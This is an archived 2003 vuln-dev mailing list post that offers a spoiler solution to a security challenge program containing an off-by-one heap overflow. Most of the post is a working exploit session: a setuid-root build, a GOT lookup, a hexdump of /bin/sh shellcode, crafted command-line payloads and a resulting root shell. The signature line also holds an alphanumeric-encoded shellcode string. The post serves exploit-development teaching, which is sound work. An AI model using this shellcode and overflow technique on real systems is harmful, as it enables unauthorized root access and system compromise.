Vulnerability Development mailing list archives
Re: vulndev1.c solution (warning SPOILER)
From: Jose Ronnick <matrix () phiral com>
Date: Tue, 13 May 2003 18:22:45 -0700
Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further..
matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadams () securityfocus com>
// Spot the error in this program.
#include <stdio.h>
#include <stdlib.h>
#define SIZE 252
int
main(int argc, char *argv[])
{
int i;
char *p1, *p2;
char *buf1 = malloc(SIZE);
char *buf2 = malloc(SIZE);
if (argc != 3)
exit(1);
p1 = argv[1], p2 = argv[2];
printf("p1 is at %p\n", p1); // DEBUG
strncpy(buf2, p2, SIZE);
for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
buf1[i] = p1[i];
free(buf1);
free(buf2);
return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1
matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1
matrix@overdose vuln-dev $ objdump -R ./vuln1
./vuln1: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049654 R_386_GLOB_DAT __gmon_start__
0804963c R_386_JUMP_SLOT malloc
08049640 R_386_JUMP_SLOT __libc_start_main
08049644 R_386_JUMP_SLOT printf
08049648 R_386_JUMP_SLOT exit
0804964c R_386_JUMP_SLOT free
08049650 R_386_JUMP_SLOT strncpy
matrix@overdose vuln-dev $ pcalc 0x4c-12
64 0x40 0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210
c031 46b0 db31 c931 80cd 16eb 315b 88c0
0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f
0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53
0000040 315 200 350 345 377 377 377 / b i n / s h
80cd e5e8 ffff 2fff 6962 2f6e 6873
0000056
matrix@overdose vuln-dev $ wc -c shell
46 shell
matrix@overdose vuln-dev $ pcalc 252-46
206 0xce 0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"`
p1 is at 0xbffff839
Segmentation fault
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf
"\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#
questions? comments? >=)
--
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP
Attachment:
_bin
Description:
Current thread:
- Re: partial analysis of vulndev-1.c, (continued)
- Re: partial analysis of vulndev-1.c Dana Epp (May 13)
- Re: partial analysis of vulndev-1.c master of chaos - lord of mean (May 13)
- RE: partial analysis of vulndev-1.c David Schwartz (May 13)
- Re: partial analysis of vulndev-1.c Nexus (May 14)
- Re: partial analysis of vulndev-1.c andrewg (May 13)
- Re: Administrivia: List Announcement Mr. Rufus Faloofus (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement andrewg (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- Re: vulndev1.c solution (warning SPOILER) Jose Ronnick (May 13)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 14)
- Re: vulndev1.c solution (warning SPOILER) Jon Erickson (May 14)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 15)
- Re: vulndev1.c solution (warning SPOILER) Kenji Cronos (May 15)
- Re: vulndev-1 exploit. Joel Eriksson (May 14)
- Re: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)
- RE: Administrivia: List Announcement Gustavo Scotti (May 13)